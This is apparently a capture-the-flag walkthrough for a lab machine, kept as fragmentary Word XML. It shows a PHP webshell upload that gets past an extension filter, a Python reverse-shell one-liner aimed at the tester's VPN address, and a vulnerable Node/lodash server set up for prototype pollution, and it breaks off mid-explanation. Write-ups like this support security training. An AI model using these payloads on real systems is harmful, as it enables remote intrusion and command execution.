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UHC v 20</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If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viwskhp36dr8"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wshxluxycsfk"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968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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4xabvxxh0qr8" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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22 – SSH</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80 – HTTP</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111 – RPCBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="24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3000</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127500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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port 80, we have a field to enter an email address. So we will submit an email and intercept the request with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BurpSuite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see what is happening behind the scenes.</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98700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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submitting the email and intercepting it with Burp, we receive our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can also notice something familiar — it looks like it is trying to perform an upload, but something is missing 🤔</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follow the redirection and see what it returns.</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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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we can see, after following the redirection and looking at the response, there is something interesting commented in the page source code. So we will change the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the_file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and while we’re at it, we will also pass a PHP webshell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Content-Disposition: form-data; name="the_file"; filename="webshell.php"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Content-Type: application/x-php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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1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 system($_GET['cmd']); ?&gt;</w:t>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52600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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we can see, it is only accepting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.jpeg</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and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.png</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extensions, but we can try other extensions such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phtml</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php5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.</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59"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changing the file extension to</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php5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we successfully bypass the restriction. However, we do not know where it is saving our file. We can perform directory fuzzing to find a directory such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload</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uploads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.</w:t>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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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find an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uploads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directory. By accessing this directory, we can see our webshell.</w:t>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74900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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6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next step will be to obtain a reverse shell. We will use a Python one:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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Online – Reverse Shell Generator</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>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562600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;IP-VPN&gt;",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'</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47900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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payload, we receive the connection =)</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46300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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the server root →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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can retrieve our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">second 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25700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.jz83eew1b41m" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral Escalation</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/uhclabs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is running on port 3000.</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const express = require('express');</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const bodyParser = require('body-parser');</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const _ = require('lodash');</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const app = express();</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const fork = require('child_process').fork;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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const users = [</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'guest', password: 'guest'},</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'admin', password: Math.random().toString(32), canExec: true}, // do not brute</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let messages = [];</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let lastId = 1;</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function findUser(auth) {</w:t>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return users.find((u) =&gt;</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u.name === auth.name &amp;&amp;</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u.password === auth.password);</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app.use(bodyParser.json());</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app.get('/api/', (req, res) =&gt; {</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res.send(messages);</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app.put('/api/', (req, res) =&gt; {</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const user = findUser(req.body.auth || {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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 (!user) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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res.status(403).send({ok: false, error: 'Access denied'});</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return;</w:t>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const message = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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icon: '😈',</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_.merge(message, req.body.message, {</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lastId++,</w:t>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timestamp: Date.now(),</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userName: user.name,</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5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messages.push(message);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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res.send({ok: true});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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9">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5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app.post('/api/store', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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const user = findUser(req.body.auth || {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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 (!user) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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res.status(403).send({ok: false, error: 'Access denied'});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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6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 child = fork('store');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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6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child.send(messages);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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child.on('message', function(m) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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console.log('received: ' + m);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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res.send(JSON.stringify(m));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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68">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6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app.delete('/api/', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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const user = findUser(req.body.auth || {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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 (!user) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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res.status(403).send({ok: false, error: 'Access denied'});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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messages = messages.filter((m) =&gt; m.id !== req.body.messageId);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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res.send({ok: true});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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72">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7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app.listen(3000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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console.log('Listening on port 3000...');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">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k4cco2pezgnv" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prototype Pollution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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recommend reviewing the links mentioned to better understand the prototype pollution vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nodejs.org/api/child_process.html#child_processforkmodulepath-args-options</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nodejs.org/api/child_process.html#child_processforkmodulepath-args-options</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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Analyzing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> code, we need to perform a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT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request to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so it merges our message, and then perform a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST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request to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/store</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
